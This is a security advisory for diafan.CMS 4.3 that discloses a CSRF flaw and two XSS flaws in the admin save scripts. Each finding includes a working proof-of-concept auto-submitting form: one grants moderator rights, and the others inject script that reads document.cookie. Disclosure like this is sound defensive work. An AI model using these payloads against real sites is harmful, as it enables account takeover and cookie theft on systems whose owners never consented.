Vulnerability ID: HTB22777
Reference: http://www.htbridge.ch/advisory/xsrf_csrf_in_diafan_cms.html
Product: diafan.CMS
Vendor: Diafan ( http://www.diafan.ru/)
Vulnerable Version:4.3and probably prior versions
Vendor Notification:28 December 2010
Vulnerability Type: CSRF (Cross-Site Request Forgery)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Low
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)
CSRF:
Vulnerability Details:
The vulnerability exists due to failure in the "http://host/admin/usersite/save2/" script to properly verify the source of HTTP request.
Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.
Attacker can use browser to exploit this vulnerability. The following PoC is available:<form action="http://host/admin/usersite/save2/" method="post" name="main" enctype="multipart/form-data"><inputtype="hidden" name="noOut" value="1"><inputtype="hidden" name="save_post" value="1"><inputtype="hidden" name="id" value="2"><inputtype="hidden" name="fio" value="first name"><inputtype="hidden" name="name" value="userlogin"><inputtype="hidden" name="password" value=""><inputtype="hidden" name="mail" value="email@example.com"><inputtype="hidden" name="created" value="23.12.2010"><inputtype="hidden" name="act" value="1"><inputtype="hidden" name="moderator" value="1"><inputtype="hidden" name="language" value=""><inputtype="hidden" name="phone" value="phone"><inputtype="hidden" name="city" value="city"><inputtype="hidden" name="street" value="street"><inputtype="hidden" name="home" value="5"><inputtype="hidden" name="corps" value=""><inputtype="hidden" name="flat" value="98"></form><script>
document.main.submit();</script>
XSS:
Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.
The vulnerability exists due to failure in the "http://host/admin/site/save2/" script to properly sanitize user-supplied inputin"text" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.
An attacker can use browser to exploit this vulnerability. The following PoC is available:<form action="http://host/admin/site/save2/" method="post" name="main" enctype="multipart/form-data"><inputtype="hidden" name="noOut" value="1"><inputtype="hidden" name="save_post" value="1"><inputtype="hidden" name="id" value="2"><inputtype="hidden" name="name" value="page name"><inputtype="hidden" name="act" value="1"><inputtype="hidden" name="actm" value="1"><inputtype="hidden" name="title_meta" value="title"><inputtype="hidden" name="keywords" value=""><inputtype="hidden" name="descr" value=""><inputtype="hidden" name="rewrite" value="sef_url"><inputtype="hidden" name="addmodule" value=""><inputtype="hidden" name="parent_id" value=""><inputtype="hidden" name="sort" value="2"><inputtype="hidden" name="theme" value=""><inputtype="hidden" name="othurl" value=""><inputtype="hidden" name="text" value='content html"><script>alert(document.cookie)</script>'></form><script>
document.main.submit();</script>
XSS:
Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.
The vulnerability exists due to failure in the "http://host/admin/news/saveNEWS_ID/" script to properly sanitize user-supplied inputin"descr" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.
An attacker can use browser to exploit this vulnerability. The following PoC is available:<form action="http://host/admin/news/saveNEWS_ID/" method="post" name="main" enctype="multipart/form-data"><inputtype="hidden" name="noOut" value="1"><inputtype="hidden" name="save_post" value="1"><inputtype="hidden" name="id" value="NEWS_ID"><inputtype="hidden" name="name" value="news name"><inputtype="hidden" name="created" value="23.12.2010 09:02"><inputtype="hidden" name="photo" value=""><inputtype="hidden" name="act" value="1"><inputtype="hidden" name="tag" value=""><inputtype="hidden" name="title_meta" value=""><inputtype="hidden" name="keywords" value=""><inputtype="hidden" name="descr" value='desc"><script>alert(document.cookie)</script>'><inputtype="hidden" name="rewrite" value=""><inputtype="hidden" name="site_id" value="5"><inputtype="hidden" name="anons" value='announce'><inputtype="hidden" name="text" value="news_text"></form><script>
document.main.submit();</script>